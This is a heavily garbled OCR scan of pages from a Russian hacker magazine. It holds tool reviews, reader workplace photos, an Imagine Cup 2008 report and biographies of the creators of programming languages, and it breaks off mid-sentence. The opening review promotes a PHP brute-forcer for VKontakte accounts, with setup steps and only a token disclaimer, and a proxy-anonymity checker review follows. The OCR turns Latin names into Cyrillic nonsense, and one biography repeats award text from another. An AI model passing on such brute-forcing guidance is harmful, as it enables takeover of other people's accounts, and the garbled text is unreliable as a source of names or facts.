ПРОГРАММА: ѴКОМТАКТЕВРУТЕ 
ОС:*МІХ/ѴІМ 
АВТОР: СНААК 

На тему «В контакте» в ][ писалось не раз — и 
что только не представлялосьтвоему взору: 
богатый арсенал от спамеров до граберов. 
Какты уже догадался, сегодня очередь дошла 
до брутеров. Хочу предложить тебе занима- 
тельную утилу «ѴкопкаккеВгике». Скрипт 
написан на РНР и обладает весьма неплохими 

ВОЗМОЖНОСТЯМИ: 
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взлом 




• Графический интерфейс 

• Большое количество настроек 

• Простота в использовании 

• Высокая скорость перебора (при 
одном потоке — около 5 паролей в се- 
кунду ) 

• Возможность работы на удаленном 
сервере 



Тебе понадобится лишь обзавестись либо 
РНР-хостингом с поддержкой сокетов, либо 
подходящим сервером. После этого можно 
приступать кустановке. Для этого: 



1. Заливаем скрипт на сервер 

2. Выставляем сПтоб 777 на файл дооб. 
бхб 

3. В файл бісбіопагу . РхР кладем 
список паролей (или етаіі ' ов) либо 
список вида етаіі : раззѵ^огб 

4. Запускаем сценарий іпбех.рПр и 
настраиваем его по своим нуждам 

5 . Активируем брут и удаляемся 
б . Пожинаем урожай : ) 






• Использование многоуровневой филь- 
трации ІР-адресов по адресу, порту, 
зоне, стране, ебс 

• Расширенный импорт и экспорт спис- 
ков прокси-серверов: поддержка рабо- 
ты с буфером обмена, работа со спис- 
ками сетевых сканеров АпдгуІРЗсаппег 
и Знрегзсаппег 

• Проверка прокси-серверов при помо 
іци КВВ-сервисов 

• Автоматический поиск публичных 
списков прокси-серверов при помоіци 
поисковых систем 

• Проверка Пббр (бгапз , апопіт) , ззі, 
зоскз4/5 прокси 

• Проверка пинга и скорости прокси- 
сервера 



Да, кстати, не забывай, что брутитьака «вспо- 
минать» можно исключительно свои пароли, а 
никоим образом не чужие. 

ПРОГРАММА: СНАРОМ Ѵ0.6 5Е 
0С:Ѵ№0Ѵ52000/ХР 
АВТОР: Ѵ1РУ$ 

Многим знакома софтина под названием 
«СЬагоп». Приглашаю познакомиться с неофи- 
циальным апдейтом этой утилы оттоварища 
ѵ1ги$. 

Тулза служит для проверки работоспособ- 
ности, функциональности и анонимности 
прокси-серверов по списку, с заданными 
параметрами. Множество сетевых настроек 
позволяют тебе откорректировать работу 
программы в соответствии со своими нуж- 
дами: установить таймаут на соединение, 
выделить заданное количество активизиру- 



Ниже приведены новшества, появившиеся с 
выходом неофициального апдейта: 



1. Обновление СЕО ІР (корректное оп- 
ределение стран) 

2. Обновление списка рІапебІаЬ-прок- 
си для фильтра 

3 . Установлены дефолтовые параметры 
для проверки прокси 

4. Добавлены новые ^ибдез 

5 . Выполнена русификация тулзы 



В общем, благодарим товарища под ником 
ѵ1 ги$ и сливаем утилу с нашего ВѴО. 

ПРОГРАММА: РАРАСОМ ^РIVЕ ВАСКУР 
0С:Ѵ№0Ѵ52000/ХР 
АВТОР: РАРАС0М50РТѴАРЕ 

О бэкапах писалось много. Но нетак-то просто 
найти подходящий инструмент для резервно- 
го копирования. Поэтому хочу обратитьтвое 
внимание натулзу Рагадоп ОгіѵеВаскир. Вот 
ее преимущества: 



Резервное копирование винчесте- 
ра в реальном времени, используя 
различные режимы архивирования 



жесткого диска. Софтина способна 
создавать бэкапы любой файловой 
системы. Для разделов Винды ты мо- 
жешь получать полный резервный ар- 
хив системного раздела, не опуская 
ОС в ребут и не закрывая каких-либо 
приложений . 

• Загрузочная архивная капсула поз- 
воляет создать специальное безопас- 
ное место на твоем винте для хранения| 
резервных архивов диска и даже для 
загрузки с него в случае неисправ- 
ности операционки . 

• Реализована специальная функция 
«Дифференциальный архив», которая 
служит для создания архивов, содер- 
жаіцих только изменения, внесенные с 
момента получения первого (базового) | 
архива . Это суіцественно сокраіцает 
объем дискового пространства, зани- 
маемого архивами. Дифференциальный 
архив наряду со встроенным планиров- 
іциком предоставит тебе полную ав- 
томатизацию резервного копирования 
жестких дисков . 

• Обеспечивается быстрое и про- 
стое восстановление данных из 
созданного ранее архива жесткого 
диска. Ты можешь просматривать 
резервные архивы и восстанавли- 
вать отдельные файлы, папки или 
целые разделы и диски. На случай, 
если система не загружается, Вгіѵе| 
Васкир содержит Кесоѵегу СВ. Ты 
также можешь создавать собствен- 
ные аварийные диски, содержаіцие 
необходимые для восстановления 
резервные архивы. 

• С помоіцью утилы можно легко 
клонировать старый жесткий диск, 
развернув его копию на новый диск 
(без установки и настройки опе- 
рационной системы и приложений) . 
Базовые операции с разделами вин- 
честера включены в Рагадоп Вгіѵе 
Васкир и позволяют добавлять 
новые винты и подготавливать их к 
работе . 



Судя по внушительному списку, лучшего инс- 
трумента в работе с бэкапами не найти. Жаль 
только, чтоутила платная. Но продукт своих 
денег стоит, поэтому поднимай заначку. 
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сцена 



РАБО^ДІЕМЕ^ 

МКТАТЁЛЕИ^І 




Нам страшно даже подумать, зачем админ ѵѵеЬргоху (асІтіп(^ 
ІѵѵеЬргоху.ги) держит р ядом с компом р уж ье (БЕРЕТТА 686 ЕД 
ІЗкееі). Бедные 




Руслан Шайхутдинов (осІіп-84гатаі1.ги) прислал фотографию места, где, 
(судя по разрушениям, спариваласьтолпа носороговІв^ІВ^^Ш^йЦР" 





(Если приглядеться к десктопу 1 2-летнего Вани Ерофеева (дапіЬа1999гаИ 
Іізі.ги), можноувидеть нечто очень похожее то ли на направленный мик^ 
рофон, то ли на излучаюіцее оружие внеземного происхождения, а также 
(одну розовую свинью-копилку.^^^^^^^^^^^^^^^^^^^І^^^Д 



ІІ5І 




|Юрий Кузьминов (киітіпоѵигарізет.пеі) собрал в своей стойке на 
работе какую-то фигню вместо сервера. По крайней мере, это похоже 

на фигню.^^^^^^^^^^^^НВ Щ 




[шикарный концепт рабочего места для бомжа представил нам Дунаев 
^Никита (пікііасіипаеѵгауапсіех.ги). 
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» 



Пришли на та§а2Іпе@геа1 .хакер. ги фотку своего действительно хакерского 
рабочего места (в хорошем разрешении) и мы опубликуем ее в следующих 
номерах! 




51оот (зіоотгауапсіех.ги) избавился от всего лишнего в компьютере. 
вЭкран чувствует себя в подобной обстановке удобнеевсего^^^^И 






''«Действительно рабочее место хакера» прислал КЕМ (еудепкепОуа.ги) 
Усилители, генераторы, осциллографы, вольтметры и прочие утюги 
|нужны для его хакерской деятельности, как воздух. ТвЯ Ц.г ^ 




ІМедасІеп’а (тедасіепгахакер.ги) отовсюду выгнали и он переселился на 
[балкон к бельевым веревкам и свежему воздуху.Ш^ ^ ^ 




[Рабочее место настоя ш,е го джигита (І1д1(0уаііііох.і 

Чайник, мюсли, полуразвалившийся недоноутбук и трафаретная линейка, 

[— будем знать. 
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МА6 ЫЕ 



СУР 2008 



Этим летом мне посчастливилось побывать на финале крупнейшего ми- 



ового студенческого ІТ-состязания. 100 000 студентов из 100 стран мира, 



гигабайты написанного кода, прекрасная атмосфера технологического 






240 000 призового фонда — все это Місго 50І1: Ітаяіпе 



творчества и 

Сио200^И 



МІ КІТ022Д ^ . 

/ ^^А^IТЕ.^IVЕ^О^НNА^.СОМ /. 



В СТРУКТУРА ІМА6ІМЕ сир 



В этом году Ітадіпе Сир, в очередной разувеличившись в масштабах, 
проходил в тринадцати категориях, названия большинства из которых не 
требуют перевода: 



5о1"1;ѵѵаге Ве5Ідп|^ 
ЕтЬеббеб Оеѵеіорт 
Эате ВеѵеЬртепІ 



зтеп^ 

'С_ 



:Рго]ес1: НозЫті» Ргодгаттіпд Ваиіі 
ІТ СЬаиепді 
МдогііЬт 
Рбоіодгарб) 

Збогі; Рііт^ 

Іпіегі'асе Ре5Ідп | 

ІпІегорегаЬШіуАѵѵагб] 

КѴІпбоѵѵз Сіѵе АѵѵагбП 



ЦссеззіЫе Тесбпоіоду Аѵѵагб 
РигаИппоѵабоп АѵѵагбІ 



Самая главная, основная, категория — это 5об:ѵѵаге Оезідп. Об этом легко 
судить даже по количеству команд, приглашенных на финал: 60. Вторая 
по численности участников категория — ЕтЬеббеб ОеѵеЬртепІ; — соб- 
рала только 1 5. Россия в этом году была представлена двумя команда- 
ми: ІдпШоп и РебОеѵіІз, выступающими, соответственно, в категориях 
5о0:ѵѵаге Оезідп и «Проект Хошими». 

Н КОМАНДА І6МІТІ0Ы 

Команда Ідпібоп состояла из трех питерских студентов: Анатолия 
Никитина, Романа Белова и Дарьи Элькиной. Под руководством Юрия 
Шура ребята разработали систему «Ѵідіі», которая служит для поддержки 
принятия решений при тушении лесных пожаров. 

Проект представляет собой достаточно сложную и многокритериаль- 
ную систему. Она позволяет моделировать процессы лесных пожаров, 
учитывая массу стационарных и динамических факторов: тип леса, 
рельеф местности, влажность воздуха и почвы, прогноз погоды, скорость 
и направление ветра ит.д. Фактически, ребята написали удобный и 
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функциональный интерфейс к математической модели лесных пожаров. 
Давая на вход изначальную информацию об очаге возгорания, карту с 
типом леса и рельефом, сведения о ветре и другие влияющие факторы, 
можно получить модель этого пожара и провести с ней ряд эксперимен- 
тов, опробуя различные способы и стратегии тушения с целью найти 
оптимальное решение. 

Тушитьлесные пожары — оченьсложное и дорогостоящее мероприятие 
и система Ѵідіі была разработана именно длятого, чтобы оптимизиро- 
вать пожаротушение, сведя последствия к минимуму. 

Система работает на базе моделей, разработанных в Санкт-Петер- 
бургском НИИ лесного хозяйства и прошедших ряд проверок и тестов 
в реальныхусловиях. Короче говоря, с наукой и реализацией задачи у 
ребятбыл полный порядок! 

Н СОРЕВНОВАТЕЛЬНЫЙ ПРОЦЕСС 



г КОМАНДА ВЕ00ЕѴІ15 и ПРОЕКТХОШИМИ 

Вторая российская команда — ВесЮеѵіІз — выступала в категории «Про- 
ектХошими» и состояла из двух человек: братьев Гребневых из Иваново. 
Выступили ребята просто феноминально: выиграли «без вариантов», 
лидируя с самого начала соревнований и до самого конца. В качестве 
приза за победу они получили чек на $8 000 и мировую славу: выиграть в 
финале Ітадіпе Сир очень почетно. 



Епдіпеегіпд Ехсеиепсе АсЫеѵетепІ; Аѵѵагб, который, кроме всего проче- 
го, подразумевает поездку на недельную стажировку в Редмонде. 

А выиграла Ітадіпе Сир в категории 5о0:ѵѵаге Везідп команда 50АК из 
Австралии, везде таскающая с собой резинового кенгуру и представив- 
шая проект инновационного орошения пахотных земель. 



Ітадіпе Сир — это во многом конкурс презентаций, во всяком случае, 
в категории 5оІ1:ѵѵаге Везідп. «Состязания» проходят в три раунда: 
все команды по специально составленному расписанию презентуют в 
полузакрытом режиметрем судьям свой проект, а судьи, в свою очередь, 
оценивают проекты, выставляя оценки по разным категориям. 

На первый план выходитто, каким образом командам удается за корот- 
кое время показатьсебя:дажесоченькр^ым исложным проектом легко 
потеряться и произвести неудачное впечатление на судей, если неправиль- 
но построить презентацию и неуверенно отвечать на вопросы. Плюс есть 
языковый аспект: все презентации, разумеется, проходятна английском и 
это является определенным ограничением для многих команд. 

Результатом трех «закрытых» раундов является выбор шести лучших, 
по мнению судей, команд, которые будут выступать на общедоступном, 
открытом финале. 

К сожалей ИЮ, команда Ідпібоп не попала вТОРб команд и поучаствова- 
ла в финальной битве. Все решило последнее, третье по счету, выступле- 
ние команды и небольшое недопонимание с французским судьей. 

В итоге российскую команду наградили специальным призом 




[Российская команда Ідпібоп получают наград' 
[Епдіпеегіпд Ехсеііепсе АсЬіеѵетепІ: АууагбзД 
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|По6едители Ітадіпе Сир крупным планом| 



ІЗа победу в «Проекте Хошими» братья Гребно- 
вы из Иваново получили мировую славу и $8к 
I в п р и д а ч 



^&А с российской 
командой І^пійоп 

Как вы попали на Ітадіпе Сир и почему выбрали категорию 
Зо^Иѵѵаге сіезі^п? 

А: Разработка нашего проекта Ѵі^іі началась задолго до того, как 
мы вообш;е узнали об Ітадіпе Сир, а произошло это в январе этого 
года - в тот момент, когда большая часть команд уже активно 
работала над своими проектами. Но получилось удачно: за два 
месяца до этого мы как раз начали переписывать наш проект под 
платформу .ЫЕТ (изначально мы разрабатывали его на ВеІрЫ) и 
у нас не было проблем с участием в конкурсе, тем более учитывая 
тему этого года. 

Что больше всего понравилось в Ітадіпе Сир? 

А: Самое классное в Ітадіпе Сир - это большое количество умных и 
нестандартно мыслящих людей, которые фокусируют свое внима- 
ние на решении реальных проблем, которые стоят перед челове- 
чеством. После российского финала мы получили кучу отзывов 
о нашем проекте от различных специалистов: программистов, 
математиков, экологов, экономистов и даже профессиональных 
пожарников! 

Как вам пришла в голову идея проекта? 

А: Первоначальная идея проекта родилась в Санкт-Петербург- 
ском НИИ лесного хозяйства около пяти лет назад. Руководи- 
тель нашего проекта Юрий Шур является всемирно известным 
специалистом в области теории лесных пожаров. Наша команда 
начала работу над проектом в 2006 году и за это время мы собрали 
и проанализировали тонны информации о моделировании лесных 
пожаров и разработали эффективную систему для их эмулирова- 

НР1Я. 



Что вы планируете делать после финала Ітадіпе Сир? Что насчет 
запуска своего бизнеса на основе проекта? 

А: Сразу после возвращения из Франции мы отправимся в Крас- 
нодарский край вместе со специалистами Санкт-Петербургского 
НИИ Лесного хозяйства. Там мы опробуем нашу систему в дейст- 
вии. Если все пройдет успешно, мы продолжим разработку Ѵі^іі 
и со временем, возможно, поучаствуем в создании компании для 
поддержки и развития проекта. 



Победители Ітадіпе Сир 



|5о^1іл^аге сІе5І§п| 



1“ место :] 80АК, Австралия 
Щ место :| Ноизекеерегз, Словакрія 
^ место :| Рі^ігаІМапіа, Венгрия 



[ЕтЬесІсіесІ Реѵе1ортеп1:| 



I место: Тгаіі Віагегз, Сингапур 
І^местОд АсісіКаіп, Ирландия 
[ место :^ ѴѴіп^5, Китай 



ЮатеВеѵеІортеіш 



Цместо^ МоШег Саіа 5і:исііо, Бразилия 
І^место;^ Вгипк Рирру Ргосіисіііопз, Бельгия 
[место? СОМ2, Корея 



рго^есШовЬітЯ 



Ц место :| Ке<1 Веѵіів, Россия 

[ место :| 2ер1іуг, Китай 
3 место: Пгеат Теат, Украина 



|ІТ СЬа11еп§е| 



Ц место :| іеап-ВепоЦ Райх, Франция 
Р место :| Созтіп-Ѵіогеі Ше, Румыния 
Р место :| Уап Еіи, Китай 



[§огі1:Ьт| 



Р место :| Котап КозЫуак, Украина 
Р место :| Згііѵезгнег ЗгеЬепі, Венгрия 
Р место :| ЫаоЫго ТакаЬазЫ, Япония 



Еп§іпеегіп§ Ехсеііепсе АсЬіеѵетепІ: 



І^пііііоп, Россия 

Аніаз, Болгария 
Зрагх, США 



► 086 
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языков 

ПРОГРАММИРОВАНИЯ 

ОНИ ТАКИЕ РАЗНЫЕ, НО КОАИНГ ИХ ОБЪЕДИНЯЕТ 



Зад умывался, почему Питон называется Питоном? Или зачем 
на логотипе Заѵа — чашка кофе и вообще, что за странные люди 
^ д р яют ся созд ават ь языки, на кото рых пото м ко д ят мил лионы? 
аже если никогда об этом н^дхмал, читай дальше и уз наешь отв еты 






сцена 




С++ 

Труднопроизносимое имя этого программиста 
имеет датские корни. Существуетдва варианта 



русского написания — Бьерн Страуструп\Бьяр- 
не Строуструп — который из них ближе к истине 
(В]агпе Бігоизігир), сказать сложно. На личном 
сайте Бьерна (буду называть его так) этому воп- 
росу посвящен отдельный, и весьма длинный, 
абзац РАО, в котором даже выложен аудио- 
файл с правильным произношением. Видимо, 
достали (хотя нескандинаву и аудио-файл вряд 
ли поможет выговорить это убийственное имя 
правильно). 

Страуструп родился в Орхусе, Дания, в дале- 
ком 1 950. Там же, в местном университете, по- 
лучил образование, а чуть позже стал доктором 
наук, поработав над конструированием распре- 
деленной системы в лаборатории Кембриджа. 

В 1 979, после защиты в Кембридже, он получил 
предложение от компании АТ&Т, а точнее, от 
уже упомянутых Веіі ІаЬогаЬгіез, и вместе 
с семьей переехал в Штаты. Одновременно 
Бьерн начал работать над созданием С++, 
который тогда назывался «Си с классами». 
Создавался язык, что называется, для себя. Как 



результат, на первых парах поддерживался он 
исключительно самим Страуструпом. Плюсы 
в имени появились позже и стали заслугой 
коллеги Бьерна — Рика Масситти. Родилась 
идея довольно просто: «плюс» — это распро- 
страненная практика обозначения каких-либо 
улучшений в программе, атакже увеличение 
значения переменной на единицу. 

На протяжении долгих лет Страуструп был 
главой отдела исследований программирова- 
ния в Веіі ІаЬз — с самого момента его созда- 
ния и вплоть до 2002 года. Затем перешел на 
должность профессора техасского универси- 
тета А&М. За прошедшие годы Бьерн написал 
несколько книг по С++. Сни переведены на 
десятки языков и являются, фактически, 
наилучшей литературой потеме. Разуме- 
ется, герой удостоен и множества наград, 
втом числе избран членом Национальной 
инженерной академии США в 2004 и отмечен 
американским научно-исследовательским 
сообществом в 2005. 




На двоихуэтихтоварищей какое-то почти не- 
приличное количество наград, включая премию 
бедняги Тьюринга и национальную медальза 



достижения в области технологий. В общем-то, 
оно и не мудрено, ведь они несут ответствен- 
ность за создание СМІХ’а и языка Си, чего, 
по-моему, вполне достаточно для медали. 
Жизнь свела этих двух разных, но по-своему 
очень похожих людей еще в 60-е годы. Сба — 
уроженцы Америки, один из Нового Срлеана, 
второй из Нью-Йорка, учились в престижней- 
ших колледжах планеты (в Беркли и Гарвар- 
де, соответственно). У обоих чисто технарское 
образование, один — магистр электротехники 
и информатики, второй — бакалавр в области 
физики и прикладной математики. 

На момент разработки Си (в начале 70-х) они 
оба трудились в известнейшем исследова- 
тельском центре Веіі ІаЬз, на счету которого 
такие открытия какфотоэлементы, транзисторы, 
первый 32-разрядный процессор и куча других 
полезных вещей. 

Над Си они работали какнадзакономерным 
продолжением языка Би, созданием которого, 
кстати, в свое время занимался Ритчи. Теперь 



он развивал свое детище в новом направлении. 
Си не был их первым совместным проектом, до 
этого уже имели место ОСь МиШсз, под которую 
специально создавался язык Воп (детище Томп- 
сона), Спіх и В. И только после этого — С. 
Сегодня уже можно не писать много красивых 
и важных слов о значимости этих разработок. 
Все понятно и так. Спіх и упомянутые языки 
действительно сильно повлияли на разви- 
тие нашего ненаглядного «компутерного» 
прогресса. «Стцам» воздалось по заслугам 
— в 83-ем году обоих наградили премией 
Тьюринга. В 99-ОМ Билл Клинтон лично вру- 
чил им медаль технологий, плюс перепало на 
их долю и много других, не таких громких, но 
все равно заслуженных наград. Старички и по 
сей день остаются в строю. Томпсон работа- 
ет в Соодіе, а Ритчи лишь совсем недавно 
отошел отдел, до этого возглавляя исследо- 
вательский отдел Сисепі; ТесЬпоІодіез, где 
занимался ССями Р1ап9и Іпі'егпо,а также 
языком ЫтЬо. 



РѴТНОМ 

Ван Россум — крайне веселый дядька и, хуже 
того, он — голландец. То есть, последнее время 
шутки про Голландию и траву, конечно, уже 
перестали бытьтакими ужсмешными, но это 
все же наводит на кое-какие размышления. 
Так, Гвидо было мало разработать собствен- 
ный язык программирования, надо было еще 
и назвать его в честь шоу «Летающий цирк 
Монти Пайтона» (Мопіу РуіЬоп’з Ріуіпд Сігсиз) 
— РуіЬоп. Смотревшие меня поймут :). 

В 1982 окончивуниверситет Амстердама, Ван 
Россум успел поработать со многими круп- 
ны ми НИИ, в том числе и американски ми. 

Сн занимался самыми различными вещами, 
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среди которых была и работа над проектом по 
созданию языка АВС. Затея у проекта была 
весьма амбициозная — АВС был призван 
полностью вытеснить ВА5ІС, Разсаі и так да- 
лее, плюссего помощью собиралисьобучать 
программированию. Перед Рождеством 1991 
года Ван Россум неожиданно заскучал и решил 
попробовать написатьсвой язык, отталкиваясь 
от на работок АВС. Счевидно, ему было очень 
скучно, потому что языкон все-таки написал. 

И любитсвое детище до сих пор. Даже спустя 
столько летон присматриваетза всем, что про- 
исходит в комьюнити и носитзабавный статус 
«великодушного пожизненного диктатора» 
(Вепеѵоіепі Вісіаіогіог ЫІе). Добавим, что с 
2005 года этот остряк работает в Соодіе. 
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^АѴА 

Гослинг— канадец. Он родился в 1955 непода- 
леку от Калгари. По образованию — бакалавр в 



области вычислительной техники (университет 
Калгари) и доктор всетехже наук, с дипломом 
университета Карнеги-Меллона. Говоря про- 
ще: профессиональный девелопер софта. 

В 80-х годах, после учебы он пошел работать 
в 51ІМ, где и стал «папой» языка ОАѴА. До 
этого, еще в университете, успел позаниматься 
разработкой мультипроцессорной версии Упіх, 
написал несколько компиляторов и почтовых 
систем. Стоит сказать, что вначале ОАѴА пред- 
назначалась для бытовой электроники. Лишь в 
процессе разработки стало ясно, что найдутся 
и более интересные области применения. Ис- 
ходно язык назывался Оак и только потом был 
переименован в Яву, путем выбора слова из 
длинного, рэндомного, списка. Ас логотипом 
все совсем просто — марка кофе «Ява» широко 
любима прогерами, отсюда и кофейная чашка. 



Гослинг, как истинный программист, суров и 
бородат. Степень его суровости легко оценить 
потакому факту — в2007 годуон впервыеза 
несколько десятков лет (зіс!) сбрил бороду. Да 
и то, исключительно из-за того, что ему делали 
операцию. В одном интервью он отметил, что 
ни жена, ни дети его до этого без бороды не 
видели. Никогда. 

Он и по сей день работает в 5СІМ, является 
соавтором ряда книги публикаций посвоему 
языку, а на родине, в Канаде, удостоен 
высшей награды страны, присуждаемой за 
успехи в какой-либо сфере — Канадского 
ордена (ОгбегоІСапасІа] и множества наград, 
втом числе избран членом Национальной 
инженерной академии США в 2004 и отмечен 
американским научно-исследовательским 
сообществом в 2005. 




РНР 

Куда мы сегодня со своим «Еньтеренетом» и 
без РНР? Правильно, никуда. Поэтому стоит 



сказать бол ьшое-п ребольшое спасибо дя- 
деньке Лердорфуза то, что он этот самый РНР 
придумал и реализовал. 

РНР появился на свет практически случай- 
но. Тебе никогда не хотелось отследить, чем 
занимаются и что именно читают люди на твоем 
сайте, в твоем блоге, еШ? Большинству — хо- 
телось. Л ердфорду тоже. В начале 90-х, будучи 
фрилансером, он рассылал потенциальным 
работодателям свое резюме в сокращенном 
виде, со ссылкой на полную версию. Тут-то ему 
и пришло в голову, что было бы крайне удобно 
как-то отлеживать посетителей странички. 

За плечами у него был диплом университета 
Ватерлоо, так что Расмус раздумывал недолго. 
Он сел и написал простенький СОІ скрипт на 
Регі, вставив его в пагу с резюме. Эту кусо- 
чек кода для сбора статистики он окрестил 
без затей: «РНР — Тооіз Іог Регзопаі Ноте 
Раде». И, решив блеснуть, сделал статистику 
общедоступной. В итоге, многие визитеры 
занятной примочкой заинтересовалась и даже 



стали спрашивать, можно ли как-то заполучить 
ее в свое пользование. Лердорф не отказал 
(тогда движения Ореп Зоигсе в нынешнем его 
виде еще не существовало, а такого рода вещи 
назывались просто «Ігееѵѵаге»). Невинная, на 
первый взгляд, фишка вылилась в первую рас- 
сылку по РН Р, которую уже на момент 1 995 года 
и создал сам Расмус, чтобы как-то облегчить 
людям возможность обмениваться мыслями и 
идеями. 

Первые версии РНР Лердорф продвигал 
и поддерживал очень активно, но тот РНР, 
каким мы знаем его сегодня, сильно далек 
от исходного. Сам его создатель с 2002 года 
работает в Уабоо, куда его позвали как раз 
по части созданного языка. Цитируя одно 
интервью: «Они хотели, чтобы я помог им с 
РНР». Своим детищем он, конечно, занима- 
ется и сейчас, но уже в качестве «одного из 
многих». Лердорф по мере сил вносит вклад 
в дело свободного ПО, регулярно помогая тем 
или иным проектам. 



ишлѵшл 

РЕРІ 

Об этом человеке мы писали уже не раз, но он 
определенно того достоин — лауреат многих 




престижных премий, камрад Уолл подарил миру 
Регі. Родившийся в 1957 в Лос-Анджелесе, Уолл 
получил совсем нетехническое образование 
— он лингвист. Есть в этом какая-то своеобраз- 
ная ирония — лингвистсоздаетязыкпрограмми- 
рования. Аведьпока он неустроился работать в 
НИИ МА5А, они сженой собирались отыскать на 
нашей планете какой-нибудьязык, до сих пор не 
имеющий письменности (например, где-нибудь 
в Африке) и создать ее, перевести на новый язык 
некоторые книги... Словом, романтика и при- 
ключения, ножизнь повернулась иначе — из-за 
проблем со здоровьем от всего этого пришлось 
отказаться и остаться в Штатах. Тогда Уолл при- 
ступил к работе в уже упомянутом заведении. 
Уолл — большой активист движения за свобод- 
ное ПО и, по сути, стоял у его истоков. Первая 
премия «Егее ЭоЛѵѵаге Аѵѵагб» была вручена 



именно ему, за все его заслуги в целом и за 
создание Регіа в частности. Вообще, довольно 
интересно, что при написании Перла Уолл ру- 
ководствовался нетолько своими программер- 
скими познаниями. Такой утверждает, что ему 
очень помогло лингвистическое образование, 
а название языку и вовсе дала Библия. Дело 
втом, что Уолл христианин, а языкизначально 
носил имя «Реагі» — жемчужина. Это была пря- 
мая отсылка: «...Реагіоідгеаі ргісе...» («...найдя 
одну драгоценную жемчужину...». Евангелие 
от Матфея 13:46). Слово «Реагі» также было и 
аббревиатурой от Ргасбсаі Ехігасбоп апб Рерогі 
Еапдиаде, но потом буква «а» потерялась. 
Сегодня Уолл хорошо известен как программист, 
автор и соавтор целого ряда книг по РегГу и, ко- 
нечно, лингвист. О своем основном и официаль- 
ном образовании он забывать не собирается. 
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ІТОМАСКУРТИДЖОНКЕМЕНИІ 



ВА5ІС 

Было бы просто стыдно не поговорить отом, кто 
придумал такую незабвенную вещь, как Бей- 
сик. История с его созданием, на самом деле, 
вышла довольно путаная, и руку к ней успело 
приложить много народу. Но исходно Вазіс 
начался именно с двух профессоров Дартмутс- 
кого колледжа — Курта и Кемени. В начале 60-х 
компьютеры только-только начали становиться 
доступнее простым смертным, и перед учеными 
впервые встал вопрос не скорости выполнения 
программ, а удобства их написания. Бейсик 
родился на свет в виду ряда особенностей 
машин с разделением времени. Под шефством 
Курта и Кемени его реализовала группа их 
студентов. Задумывался он как язык для обу- 
чения программированию, хотя впоследствии 



» 



большая часть критики строилась на том, что 
после Вазіс’а нормально прогать человекне 
может, и исправить это уже не удастся. Как бы то 
ни было, в 1963 языкбыл создан и получил имя 
ВагІтоиіЬ ВА5ІС. 

Настоящая же популярность пришла к нему 
только в 1975 году. Тогда будущая Місгозоб: (в 
то время просто два человека: Билл Гейтс и 
Полл Алиен) написали под него интерпретатор 
для компьютеров АКаІгЗбОО, названный АКаІг 
ВА5ІС. Языкстремительно разветвился на мно- 
жество диалектов. Например, Арріе II базиро- 
вался на одной из его версий, а под ОСь СР/М 
написали ВА5ІС-80. Заметим, что второе (или 
даже третье) дыхание развитию Вазіс дал опять 
же МісгозоИ Произошло это в начале 90-х, 
когда был выпущен Ѵізиаі Вазіс, уже совсем не 
похожий на своего предка. 
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тирво РА5САЦ ОЕЕРНІ, С#. 



ДатчанинХейлсбергродился вдекабре 1960. 

В родном Денмарке он окончил местный 
университет и получил образование инженера- 
программиста. Надо заметить, программист из 
него вышел талантливый. В сумме он приложил 
руку ктрем языкам — на его счету ТигЬо Разсаі, 
ВеІрЬі и С#. Еще учась вуниверситете, он стал 
писать программы под микрокомпьютеры 
Мазсопп и создал компилятор для Паска- 
ля, который изначально назвал Віие ЕаЬеІ 
Разсаісотрііег. Впоследствии он портировал 
наработку под М5-В05 и переименовал в 
Сотраз Разсаі, а позже — в РоІуРазсаІ. Со всем 
этим счастьем Андерс находился под крылом 
небезызвестной компании Вогіапсі, которая и 
лицензировала его детище (ака Турбо Паскаль). 
Со временем под пристальным наблюдением 



Хейлсберга, который, кстати, занимал в Вогіапсі 
Іпіегпаііопаі пост главного инженера, ТигЬо 
Разсаі нетолько развился, но и постепенно 
эволюционировал в ВеІрЬі. Над этой «заменой» 
опять же трудился сам Андерс, являясь главным 
архитектором проекта. 

В 1996 он покинул Вогіапсі и перешел прями- 
ком к их главным конкурентам — МісгозоИ 
Незабвенные мелкомягкие очень хорошо 
умеют переманивать к себе специалистов. В М5 
Хейлсберг поначалу корпел над языком 5++, а 
потом быстренько дорос до главного архитек- 
тора проекта по созданию языка С#. Чем это 
закончилось, мы прекрасно знаем — уАндерса, 
конечно, все получилось. Сегодня он явля- 
ется заслуженным инженером (бізЬпдиізЬесІ 
епдіпеег) компании и продолжаетзаниматься 
всяческой поддержкой и развитием своего 
творения. 
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Ну вот, мы снова возвращаемся к «с ильным и 
бородатым» мира сего. Швейцарец с «гово- 
рящей фамилией» Виртза свои 74 года успел 
приложить руку с созданию таких языков, 
как Еиіег, АІдоІ-ѴѴ, РІ/360, Разсаі, Мосіиіа, 
МосІиІа-2, ОЬегоп, ОЬегоп-2, Сотропепі: 
Разсаі. Три из них — на его личном счету (Пас- 
каль, Модула и Оберон). 

Вирт — очень известный ученый и один из 
пионеров информатики. Родился он в 1 934 и 
в прямом смысле стоял у истоков всего, что 
мы сегодня пожинаем. Самыми известными и 
оказавшими наибольшее влияние на развитие 
программирования разработками, конечно, 
стали Паскаль, которой послужил фундаментом 
для многих других языков, и участие в разра- 
ботке технологии структурного программиро- 
вания (совместно с Дей кстра и Хоаром). 

За свою долгую жизнь Вирт успел порабо- 
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Удивительно, но Мацумото единствен- 
ный автор нашей подборки, кто родом с 
Востока. Страна восходящего солнца не 
испытывает недостатка в светлых умах, 
но, видимо, им как-то не везет с языками 
программирования. 

Юкихиро ака Ма 1 ; 2 , по его собственным заве- 
рениям, про гать начал, еще учась в школе. 
Это было где-то в начале 70-х (учитывая, что 
он 1 965 года рождения). А известен японец 
тем, что разработал язык ВиЬу. Основное 



назначение и призвание языка — естествен- 
ность (не путать с простой). Маі:^ хотел соз- 
дать что-то более мощное, чем Перл и более 
объектное-ориентированное, чем Питон. В 
итоге, у него вышел сплав из Регі, ЗтаШаІк, 
Еі^^еі, Асіа и Еізр, а полученное творение 
было названо ВиЬу («Рубин»). Интересно, 
что Мацумото — человек верующий. Он 
активный член Церкви Иисуса Христа Святых 
последних дней, то есть, мормон. Чего же 
здесь та ко го интересного, спросишь ты. А то, 
что название РиЬу — своего рода поклон в 
сторону Перла, о происхождении названия 
которого речь уже шла чуть выше. Любопыт- 
ное «совпадение». 




ІЖОН МАККАРТИ: 
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Пожалуй, самый пожилой участник нашей «пе- 
реписи» и один из самыхзначимых. Маккарти 
родился в 1 924 году, в США. 

Деятель он более чем известный, напри- 
мер, привычный нашему стобой уху термин 
«искусственный интеллект» (Агббсіаі 
ІпІеШдепсе, АІ) принадлежит именно ему, 
Маккарти ввел его в обиход еще в 1955. Но 
раз уж мы говорим о языках программирова- 
